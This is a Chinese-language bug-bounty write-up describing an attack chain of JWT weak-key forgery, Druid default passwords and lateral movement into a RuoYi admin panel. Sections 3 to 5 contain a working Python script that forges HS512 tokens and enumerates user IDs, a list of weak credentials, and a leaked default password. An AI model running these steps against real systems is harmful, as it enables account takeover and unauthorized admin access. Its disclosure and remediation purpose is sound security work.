JWT伪造漏洞与弱口令综合实战分析<\/h1>

1. 漏洞概述<\/h2>

本次实战案例中发现了两个主要安全漏洞：<\/p>

JWT弱密钥漏洞<\/strong>：系统使用弱密钥生成JWT令牌，攻击者可伪造任意用户令牌<\/li>

Druid弱口令漏洞<\/strong>：管理系统存在默认\/弱口令，可获取敏感信息<\/li> <\/ol>
这两个漏洞组合可导致完整的系统沦陷，从普通用户权限提升至管理员权限。<\/p>
2. JWT基础知识<\/h2>
2.1 JWT结构<\/h3>
JWT(JSON Web Token)由三部分组成：<\/p>

Header：包含算法类型和token类型<\/li>
Payload：包含用户声明数据<\/li>
Signature：用于验证token完整性的签名<\/li> <\/ul>
2.2 漏洞原理<\/h3>
当系统使用弱密钥生成JWT签名时，攻击者可以：<\/p>

获取有效JWT样本<\/li>
破解或猜测签名密钥<\/li>
伪造任意用户的JWT令牌<\/li>
使用伪造令牌获取未授权访问<\/li> <\/ol>
3. 漏洞挖掘过程<\/h2>
3.1 目标发现<\/h3>

通过微信小程序作为入口点<\/li>
选择"我的-微信登录"功能触发JWT生成<\/li> <\/ul>
3.2 JWT收集与分析<\/h3>

抓取登录过程中的网络请求<\/li>
识别响应中的JWT令牌<\/li>
使用工具解码JWT获取结构信息<\/li> <\/ol>
示例JWT解码：<\/p>
Header: { "alg": "HS512", "typ": "JWT" } Payload: { "user_id": 123, "user_key": "1b00d587-528d-4a01-9464-49c2dcf2cebf", "dept_id": null, "tenant-id": 1001, "username": "测试用户_8650" } <\/code><\/pre> 3.3 JWT密钥爆破<\/h3> 使用jwt-cracker<\/code>等工具爆破密钥<\/li> 发现系统使用弱密钥：abcdefghijklmnopqrstuvwxyz<\/code><\/li> 验证密钥有效性<\/li> <\/ol> Python验证脚本示例：<\/p> import<\/span> jwt <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>def<\/span> verify_jwt<\/span>(token, key): <\/span><\/span> try<\/span>: <\/span><\/span> decoded =<\/span> jwt.<\/span>decode(token, key, algorithms=<\/span>['HS512'<\/span>]) <\/span><\/span> return<\/span> True<\/span> <\/span><\/span> except<\/span>: <\/span><\/span> return<\/span> False<\/span> <\/span><\/span><\/code><\/pre>3.4 用户枚举攻击<\/h3> 发现payload中包含user_id<\/code>字段<\/li> 编写脚本遍历所有可能的user_id<\/li> <\/ol> Python攻击脚本：<\/p> import<\/span> jwt <\/span><\/span>import<\/span> requests <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>key =<\/span> "abcdefghijklmnopqrstuvwxyz"<\/span> <\/span><\/span>secret =<\/span> base64.<\/span>b64decode(key[:len(key) -<\/span> (len(key) %<\/span> 4<\/span>)]) <\/span><\/span> <\/span><\/span>for<\/span> user_id in<\/span> range(1<\/span>, 4104<\/span>): <\/span><\/span> payload =<\/span> { <\/span><\/span> "user_id"<\/span>: user_id, <\/span><\/span> "user_key"<\/span>: "dummy-key"<\/span>, # 需要从有效JWT获取<\/span> <\/span><\/span> "tenant-id"<\/span>: 1001<\/span> <\/span><\/span> } <\/span><\/span> forged_jwt =<\/span> jwt.<\/span>encode(payload, key, algorithm=<\/span>"HS512"<\/span>) <\/span><\/span> <\/span><\/span> headers =<\/span> { <\/span><\/span> "Authorization"<\/span>: forged_jwt, <\/span><\/span> "source-client"<\/span>: "miniapp"<\/span> <\/span><\/span> } <\/span><\/span> <\/span><\/span> response =<\/span> requests.<\/span>get("https:\/\/target.com\/system\/api\/getUserInfo"<\/span>, headers=<\/span>headers) <\/span><\/span> if<\/span> response.<\/span>status_code ==<\/span> 200<\/span>: <\/span><\/span> print(f<\/span>"Valid user found: <\/span>{<\/span>user_id}<\/span>"<\/span>) <\/span><\/span> print(response.<\/span>json()) <\/span><\/span><\/code><\/pre>3.5 任意用户登录<\/h3> 清空小程序缓存重新登录<\/li> 拦截登录响应<\/li> 替换响应中的JWT为伪造令牌<\/li> 成功以目标用户身份登录<\/li> <\/ol> 4. Druid弱口令漏洞<\/h2> 4.1 后台发现<\/h3> 目录爆破发现\/system\/druid\/login.html<\/code><\/li> 注意请求需携带有效JWT<\/li> <\/ol> 4.2 弱口令登录<\/h3> 使用常见弱口令组合：<\/p> admin\/admin<\/li> admin\/123456<\/li> root\/root<\/li> <\/ul> 成功使用admin\/123456<\/code>登录后台<\/p> 5. 系统横向移动<\/h2> 5.1 发现若依系统<\/h3> 在8081端口发现若依框架<\/li> 使用已获取的JWT访问API<\/li> <\/ol> 5.2 获取初始化密码<\/h3> 访问接口获取系统初始化密码：<\/p> GET \/prod-api\/system\/config\/2 HTTP\/1.1 Host: target:8081 Authorization: [valid_jwt] <\/code><\/pre> 响应中包含默认密码：Eedssrcpt2024!<\/code><\/p> 5.3 后台登录<\/h3> 枚举获取的用户名列表<\/li> 使用默认密码登录后台<\/li> 获取管理员权限<\/li> <\/ol> 6. 防御措施<\/h2> 6.1 JWT安全最佳实践<\/h3> 使用强密钥（至少256位随机字符串）<\/li> 定期轮换密钥<\/li> 设置合理的令牌过期时间<\/li> 避免在JWT中存储敏感信息<\/li> 使用非对称加密算法（如RS256）<\/li> <\/ol> 6.2 后台安全加固<\/h3> 修改所有默认密码<\/li> 实施强密码策略<\/li> 启用多因素认证<\/li> 限制管理后台访问IP<\/li> 监控异常登录行为<\/li> <\/ol> 6.3 系统监控<\/h3> 实施JWT吊销机制<\/li> 记录和分析JWT使用情况<\/li> 监控异常API调用<\/li> <\/ol> 7. 漏洞报告要点<\/h2> 向SRC提交此类漏洞时需包含：<\/p> 漏洞详细复现步骤<\/li> 漏洞危害证明（如获取的管理员权限截图）<\/li> 漏洞原理分析<\/li> 修复建议<\/li> 相关时间戳和证据<\/li> <\/ol> 8. 总结<\/h2> 本案例展示了如何通过组合漏洞从普通用户提升至系统管理员权限：<\/p> 利用JWT弱密钥伪造高权限令牌<\/li> 通过弱口令进入管理后台<\/li> 利用信息泄露获取更多系统访问权限<\/li> <\/ol> 这种攻击链在现实中十分常见，强调了纵深防御的重要性。<\/p>